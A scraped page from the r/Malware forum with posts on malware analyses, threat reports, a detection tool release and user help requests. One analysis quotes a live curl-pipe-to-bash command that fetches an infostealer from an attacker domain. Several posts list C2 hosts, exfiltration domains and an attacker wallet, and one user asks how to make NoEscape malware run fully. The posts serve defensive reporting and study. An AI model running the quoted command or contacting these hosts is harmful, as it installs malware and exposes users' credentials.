Login

r/Malware

IOCX v0.7.0 — deterministic heuristics + adversarial PE samples
▲ 3 r/Malware

IOCX v0.7.0 — deterministic heuristics + adversarial PE samples

IOCX v0.7.0 is out. It’s a static IOC extraction and PE‑analysis engine built for DFIR and malware‑analysis workflows focused on deterministic behaviour. This release adds a deterministic heuristic engine, new adversarial PE samples, and a contract‑testing framework to keep output stable across runs.

Key changes in v0.7.0:

Deterministic heuristic engine (new)  

Snapshot‑tested heuristics for:

  • anti‑debug API usage
  • TLS callback anomalies
  • packer‑like section layouts + entropy
  • RWX sections
  • import‑table anomalies
  • signature anomalies

Runs under analysis_level = full and is designed to avoid false‑positive reconstruction.

Adversarial PE samples (new)  

Three intentionally hostile binaries covering:

  • rich/atypical imports
  • high‑entropy + malformed Rich Headers
  • split/reversed/null‑interspersed strings

Useful to validate deterministic heuristics and literal-only IOC extraction.

Rich Header crash fix  

Malformed Rich Headers with non‑UTF8 bytes could break JSON serialization. v0.7.0 adds a deep sanitiser that hex‑encodes nested byte structures for deterministic, JSON‑safe output.

Snapshot‑driven contract testing  

Each sample has a byte‑for‑byte JSON snapshot. Output must match exactly — same file, same output, every time.

Performance

Remains ~28 MB/s on typical PE samples.

Links

GitHub: https://github.com/iocx-dev/iocx  

PyPI: https://pypi.org/project/iocx/

Example

pip install iocx

iocx suspicious.exe -a full

Happy to hear feedback from anyone working with obfuscated or adversarial PE samples.

u/iocx_dev — 7 hours ago
▲ 12 r/Malware+1 crossposts

TamperedChef within GTA V/FiveM mods report - ModsHub / Network Graphics

This is ModsHub (formerly FiveMods) - a GTA V/FiveM software claiming to have over 1,2 million active users. It falls under the family TamperedChef.

It shares similarities with previous TC-classified software - e.g. it collects a lot of system user data, provides extensive logging, various backup domains, obfuscated C2 communication and scheduled task set to autorun every day at 18:00 with a custom argument.

We have also discovered a more capable variant (which does not fall under the same business/network) called Network Graphics that includes for example WebSocket connection that shares undeniable similarities with ModsHub - the code, technical functionality, behaviour and code signer Danylo Babenko are all almost identical.

Full report: https://rifteyy.org/report/tamperedchef-within-gta-v-modding-community

u/rifteyy_ — 3 days ago
▲ 1 r/Malware+1 crossposts

Autre post random : pourquoi pas les comptes 😭

Pour la blague, je voudrais faire une présentation avec un PC Windows 11 infecté par NoEscape.exe.

Or, j'ai constaté avec une grande déception que, sous Windows 11 25H2 Famille, on n'a pas les comptes parasites, mais tout le reste fonctionne ?

Qu'est ce qui ne va pas et comment le corriger ?

reddit.com
u/Alternative-Camp-619 — 4 days ago
▲ 20 r/Malware+1 crossposts

malware-check - Open source tool for detecting malicious code in source files and binaries (MIT)

I open-sourced a CLI tool that scans source code and compiled binaries for malicious patterns.

Repository: https://github.com/momenbasel/malware-check License: MIT Language: Python

What it covers:

  • Source code analysis across 15+ languages (Python, JS, PHP, Go, Java, C, Ruby, etc.)
  • Binary analysis for PE (Windows), Mach-O (macOS), ELF (Linux)
  • YARA rule scanning with bundled rules
  • Docker sandbox for behavioral analysis of suspicious binaries
  • Privacy analyzer for tracking SDKs and PII handling
  • MobSF integration for APK/IPA mobile app analysis
  • Output formats: Console, JSON, HTML, SARIF 2.1.0

Detects: reverse shells, backdoors (all languages), web shells, obfuscated payloads (auto-decodes base64/hex/charcode), crypto miners, ransomware, credential theft, supply chain attacks, keyloggers, persistence mechanisms.

Feedback welcome - especially on detection pattern coverage gaps or false positive rates.

u/meowerguy — 8 days ago
▲ 0 r/Malware

cheap chinese fake iphone.

I piced up a very cheap (30 usd) fake iphone 17 as a joke. Ots pretty slow and runs android.

can i log into my accounts like Whatsapp and Gmail.
is it fine to connect to my home wifi?

thanks!

reddit.com
u/CharityDue2017 — 10 days ago
🔥 Hot ▲ 88 r/Malware

I was targeted by a fake job interview on Wellfound. Instead of becoming a victim I reverse-engineered the malware. Here's the full analysis: 571 encrypted config values decrypted, C2 and Sentry DSN exposed, DPRK/Contagious Interview attribution.

Last week I received what looked like a legitimate job opportunity on Wellfound. An operator persona named "Felix" at "HyperHive" ran a multi-email social engineering chain referencing my real CV and technical background, then directed me to "review the product" at hyperhives.net before a scheduled interview. Navigating to Settings → Diagnostics → Log triggered:

curl -s https://macos.hyperhives.net/install | nohup bash &

I did not enter my password into the fake dialog that appeared. I killed the processes, preserved the binary, and spent the next several hours reverse-engineering it in an air-gapped Docker lab.

The binary: 8.5MB Mach-O universal (x86_64 + arm64), Rust-compiled, production-grade infostealer. Currently 9/72 on VirusTotal — Sophos, CrowdStrike, Malwarebytes, and most enterprise tools are missing it.

The encryption problem: Every operationally significant string was encrypted using a custom cipher with 570 unique x86_64 helper functions. Each function computes a unique key offset via custom arithmetic (imul, rol, xor, shr, neg). I emulated all 570 functions using Unicorn CPU emulator and recovered all 571 encrypted configuration values in 1.1 seconds.

What that exposed:

  • C2: cloudproxy.link (4 endpoints: /m/opened, /m/metrics, /m/decode, /db/debug)
  • Sentry DSN: 526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976.ingest.de.sentry.io/4509422649213008 — a legal subpoena to Sentry for org 4509139651198976 would yield the operator's registration email, payment records, and IP history
  • Build identity: user rootr, codename force, version 9.12.1
  • 276 Chrome extension IDs targeted: 188 crypto wallets, 3 password managers, Deloitte credential store

What it steals: browser passwords, credit cards, cookies, login keychain, Apple Notes, Telegram session data, crypto wallet extensions.

TTP alignment: Wellfound fake recruiter, multi-step trust building, curl|bash delivery, Rust macOS binary, fake password dialog, massive crypto wallet targeting — consistent with DPRK Contagious Interview / CL-STA-240.

Disclosure timeline: Email received April 4. Analysis completed April 6. Reported to FBI IC3 April 6. Publishing April 7.

Full repo with YARA rules, Sigma rules, STIX 2.1 bundle, ATT&CK Navigator layer, decryption scripts, and all IOCs: https://github.com/Darksp33d/hyperhives-macos-infostealer-analysis

VirusTotal (9/72 detections): https://www.virustotal.com/gui/file/5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3/detection

reddit.com
u/SD483 — 15 days ago
▲ 0 r/Malware+1 crossposts

Nuitka to python. Nuitka is not really cython code due to dependencies I recommend to create new python compiler for protect your source not by weak compiler like Nuitka also you need decrypt xored nuitka blob in 4.0 (very easy task)

github.com
u/HydraDragonAntivirus — 11 days ago
▲ 7 r/Malware

Phishing via Google Storage Abuse Leading to RAT Deployment

Any[.]run identified a multi-stage phishing campaign using a Google Drive-themed lure and delivering Remcos RAT. Attackers place the HTML on storage[.]googleapis[.]com, abusing trusted infrastructure instead of hosting the phishing page on a newly registered domain.

The chain leverages RegSvcs.exe, a legitimate signed Microsoft/.NET binary with a clean VirusTotal hash. Combined with trusted hosting, this makes reputation-based detection unreliable and lowers alert priority during triage. File reputation alone is not enough. Detection depends on behavioral analysis and sandboxing.

The page mimics a Google Drive login form, collecting email, password, and OTP. After a “successful login,” the victim is prompted to download Bid-Packet-INV-Document.js, triggering a multi-stage delivery chain:

S (WSH launcher + time-based evasion) -> VBS Stage 1 (download + hidden execution) -> VBS Stage 2 (%APPDATA%\WindowsUpdate + Startup persistence) -> DYHVQ.ps1 (loader orchestration) -> ZIFDG.tmp (obfuscated PE / Remcos payload) -> Textbin-hosted obfuscated .NET loader (in-memory via Assembly.Load) -> %TEMP%\RegSvcs.exe hollowing/injection -> Partially fileless Remcos + C2

Analysis session: https://app.any.run/tasks/0efd1390-c17a-49ce-baef-44b5bd9c4a97

TI Lookup query: domainName:www.freepnglogos.com and domainName:storage.googleapis.com and threatLevel:malicious

IOCs
Phishing URLs:
hxxps://storage[.]googleapis[.]com/pa-bids/GoogleDrive.html
hxxps://storage[.]googleapis[.]com/com-bid/GoogleDrive.html
hxxps://storage[.]googleapis[.]com/contract-bid-0/GoogleDrive.html
hxxps://storage[.]googleapis[.]com/in-bids/GoogleDrive.html
hxxp://storage[.]googleapis[.]com/out-bid/GoogleDrive.html

Credential exfiltration domains:
usmetalpowders[.]co
iseeyousmile9[.]com

Credential exfiltration path:
/1a/uh.php

Malware staging host:
brianburkeauction[.]com

Source: r/ANYRUN

u/malwaredetector — 13 days ago
▲ 4 r/Malware

Behavioral Analysis: XWorm v6.5 RAT Dropper via Batch File

Hello,

I downloaded a sample from Malwarebazaar. It was a .bat file around 208.38 KB. I set it up into AnyRun, and started the analysis.

---

Threat Type: XWorm v6.5 (RAT) + Stealer sold as Malware-as-a-Service. Capabilities include credential theft, keylogging, screenshot capture, file exfiltration, and hijacking of crypto wallets and accounts.

Execution Process:

  1. .bat file runs -> checks for sandbox using findstr.exe
  2. Uses certutil.exe to Base64-decode an embedded payload
  3. cscript.exe executes decoded VBScript, dropping svchost.exe (fake) to %TEMP%
  4. Payload launches, copies itself to %APPDATA%\main.exe and the startup folder for persistence
  5. Connects to C2 and sends system fingerprint via Telegram Bot API

IOCs

Dropper SHA256: dea6cfb3234780ceeea718787e027cc6d2de18cfead1f8cc234e0ad268987868

Dropped Payload SHA256: 7f2b0ffbc5b149b4f9858589763bacdebf63ea1b3a00532e9278d613f75462ea

  • C2: 23.160(.)168.174:3212
  • AES Key: <666666>
  • Mutex: XUH24Sz2TPub4OF4
  • USB drop name: XWorm V6.5 by c3lestial(.)fun

Full Analysis: https://app.any.run/tasks/1cd22443-8259-49c0-8e6e-a0ca93b0371c

u/Next-Profession-7495 — 7 days ago
▲ 0 r/Malware

Hello message on iPhone out of the blue

I woke up one morning and found a weird screen message “hello” what was preventing me from seeing the time.

It was asking me to click on something that led to another message asking again to click on some configurations - it resembled the set up in a brand new iPhone , so I thought an update got installed automatically overnight .So I clicked on everything because the screen was not like the normal one and I just needed to see what time it was .

But it turns out there was no update at all.

All this happened 3 days after my mother gave me (on the phone) the password for the WiFi connection. Was someone recording my conversations and then got access to my WiFi and infected my device??

Since then my smartphone has a heating issue, safari pages crash all the time…

Any ideas what’s causing this?

reddit.com
u/Otherwise_Seat_2950 — 9 days ago
▲ 9 r/Malware

Atomic Stealer (AMOS) macOS Malware Decryption, Anti-VM, Hardware Wallet Trojanization & Persistent Backdoor

Picked up a low-VT AMOS sample on March 12 worth flagging. Aligns with the recent malext variants but layers a few things we haven't seen combined before:

  • Custom multi-stage decryption (hex → ASCII → base64 via custom hash table) serving obfuscated osascript payloads at runtime — static analysis gets you almost nothing
  • Anti-VM via system_profiler checking for QEMU/VMware/KVM processor strings and known sandbox hardware serials, run twice before payload delivery
  • Payload written to /bin/zsh child process iteratively via write() loop — no plaintext payload on disk
  • 300+ crypto extension IDs targeted + full desktop wallet scraping
  • Hardware wallet trojanization — silently replaces Ledger, Trezor, and Exodus with adhoc-signed phishing lookalikes that harvest passwords and seed phrases to systellis[.]com
  • Three-layer persistence: root LaunchDaemon (com.finder.helper) → ~/.mainhelper backdoor pulled from C2 → ~/.agent polling loop that pivots backdoor execution into the active console user's context every second via stat -f "%Su" /dev/console
iru.com
u/Few-Calligrapher2797 — 13 days ago
▲ 7 r/Malware

@fairwords npm packages compromised by a self-propagating credential worm - steals tokens, infects other packages you own, then crosses to PyPI

Three @fairwords scoped npm packages were hit today by what appears to be the
TeamPCP/CanisterWorm campaign. The interesting part isn't just the credential theft, it's what it does with your npm token afterward.

What the postinstall payload does:

  • Harvests environment variables matching 40+ patterns (AWS, GCP, Azure, GitHub, OpenAI, Stripe, etc.)
  • Reads SSH keys, .npmrc.kube/config, Docker auth, Terraform credentials, .git-credentials
  • Steals crypto wallet data - Solana keypairs, Ethereum keystores, MetaMask LevelDB, Phantom, Exodus, Atomic Wallet
  • Decrypts Chrome saved passwords on Linux using the well-known hardcoded PBKDF2 key ("peanuts" / "saltysalt")
  • Scans /proc/[pid]/environ for tokens in other running processes

Affected versions:

  • fairwords/websocket 1.0.38 and 1.0.39
  • fairwords/loopback-connector-es 1.4.3 and 1.4.4
  • fairwords/encryption 0.0.5 and 0.0.6

If you have any of these installed, rotate npm tokens, cloud keys, SSH keys immediately and check whether any packages you maintain received unexpected version bumps.

Full analysis with IOCs and payload walkthrough in the blog.

safedep.io
u/BattleRemote3157 — 14 days ago
▲ 3 r/Malware

Another cryptominer - undected by Windows Defender / ESET NOD32 and Malwarebytes

Obvious signs: High cpu activity without any "visible" reason.

The malware creates a fake dwm.exe process. That process is additional to the original dwm.exe of Windows. It connects to a dutch vps.

It hides itself from the most comon end-user used process listing methods (task manager, sysinternals process explorer, perfmon etc.).

It is not detected by Windows Defender, by Malwarebytes and ESET NOD32.

It can be spotted when renaming SysInternals Process Explorer executable or using a tool like System Informer. Process Explorer is unable to kill this process, while System Informer is.

Based on what I see, that dmw.exe doesn't exist as file, only in memory.

The fake process

Protected process

The unauthorized connection

reddit.com
u/Office-These — 15 days ago
▲ 1 r/Malware

My personal PlugX analysis

Hello,
i wanted to share the findings I found on this malware (SHA256 included on the first page of the link, linking to malwarebazaar).
I started 4 months ago and this is my first "APT" analysis. Reason i'm saying this is that if you have any feedback, suggestions, or corrections regarding either the analysis or the drafting of the text, I’d be more than happy to hear them, since I’m always learning. The entire analysis was done “blind”, meaning I didn’t read any prior analyses by others. This was essentially a personal challenge for me, and also a way to study more effectively: it’s better to really bash my head with it than to just read how it works (over a month and a half...).

A quick run-down:
Tools used:
Die, Sysinternals, IDA, x32dbg.

As many of you probably know (since it widely published) the malware is a side loader. In this case it was using the media player "mpc-hc", it crashed by then calling "initcrashrpt.dll" and starting the injection followed by threads.

Sadly by technical inability I couldn't understand if data were to be exfiltrated during the initial contact with C2 (beaconing).

Only data i retrieved is the ID that it was sending. However, aside from seeing what was or wasn't stolen I think is really nice to see and understand the techniques used (e.g. Peb-Walking)

The focus of the guide was to make it as a guided walkthrough where i explain some concept that I also had to stop and open the docs to learn (not trying to sound condescending since im still a beginner, simply my english is bad)

https://github.com/Nimbax1/My-Malware-Analysis/blob/main/PlugX/Analysis.md

[Edit - typos]

u/Nimbax — 14 days ago
▲ 1 r/Malware

Fender Studio Pro 8 crack from RuTracker installed a miner + RAT on my PC!

Downloaded Fender Studio Pro 8 crack from RuTracker (TEAM R2R release). Ran it. Nothing happened. Thought I was fine.

Next day, I noticed an unknown app in my startup menu that I had never seen before. That is when I started digging.

Here is exactly what I found and how you can check your own PC.

What the crack did

The crack executed several R2R tools on Day 1:

File Time
R2R System v1.3.1.exe 5:07 PM
Setup Sphere Manager v3.0.0.exe 5:14 PM
SphereManager.exe 5:52 PM
WitchConfig.exe 5:55 PM

Nothing seemed wrong at the time. But these tools were silently installing malware.

What the malware installed

Component Details
File RuntimeHost.exe (original name SimpleRunPE.exe) hidden in C:ProgramDataMicrosoftWindowsCachesD3F4E2A1
Attributes Hidden + System (+h +s) - invisible in File Explorer by default
Persistence 3 scheduled tasks named "Windows System Health", "Windows System Health Check", "Windows System Health Monitor"
Registry abWinSysCache key in HKCU...Run to run on every boot
Process hollowing Malware injected itself into legitimate InstallUtil.exe (PID 9048) to hide
Payload GMiner cryptominer configured to mine BeamHash to attacker's wallet via beam.2miners.com:5252

Attacker wallet: 39f1c115f278f33c79f2097fd300c92f627d9e5999f8d580c3736c499b29b8c3da7

The 24-hour delay trick

The crack installed everything on Day 1 but set the scheduled tasks to trigger on Day 2. This is deliberate. If the malware ran immediately, you would suspect the crack. By waiting a day, most people never make the connection.

How I traced it (brief technical steps)

  1. UserAssistView - Showed every executable the crack ran with exact timestamps
  2. File Explorer - Enabled "Show hidden files" and unchecked "Hide protected operating system files" to reveal the hidden malware folder
  3. VirusTotal - Uploaded RuntimeHost.exe, got 47/72 detections
  4. Hollows Hunter - Detected process hollowing with "replaced": 1 flag on PID 9048
  5. Task Scheduler - Found 3 malicious tasks with Author = my username (not Microsoft)
  6. Registry Editor - Found abWinSysCache Run key pointing to the malware
  7. schtasks command - Exported all tasks to CSV for analysis

How to check your own PC

  • Run UserAssistView to see recent executables
  • Check C:\ProgramData\Microsoft\Windows\Caches\ for random folders with hidden .exe files
  • Open Task Scheduler and look for tasks named "Windows System Health" with YOUR username as author
  • Open Regedit and check HKCU\Software\Microsoft\Windows\CurrentVersion\Run for abWinSysCache
  • Run Hollows Hunter as admin and look for "replaced": 1 in the output

Confirmation from security vendors

VirusTotal SHA-256: 02743f00223117c2c04fbfb8267ac7272be632a552b8182e943032d1c78a8bf5

Vendor Detection
Microsoft Trojan:Win32/Kepavll!rfn
Kaspersky HEUR:Trojan.Win32.Generic
Malwarebytes Trojan.CoinMiner
ESET MSIL/CoinMiner.BYG
BitDefender Gen:Variant.Zusy.605690

47 out of 72 security vendors flagged it as malicious. File is unsigned with fake Microsoft copyright.

What I did to clean it

taskkill /pid 9048 /f
schtasks /delete /tn "\Windows System Health" /f
schtasks /delete /tn "\Windows System Health Check" /f
schtasks /delete /tn "\Windows System Health Monitor" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v abWinSysCache /f
rmdir /s /q "C:\ProgramData\Microsoft\Windows\Caches\D3F4E2A1"

Why I am posting this

I want to warn others about downloading cracks from RuTracker. This specific Fender Studio Pro 8 release (TEAM R2R) is malicious.

I am open to providing all evidence for anyone who wants to read it - full forensic trace with timestamps, screenshots, and analysis.

Stay safe

i.redd.it
u/ThisWasNeverTheEnd — 1 day ago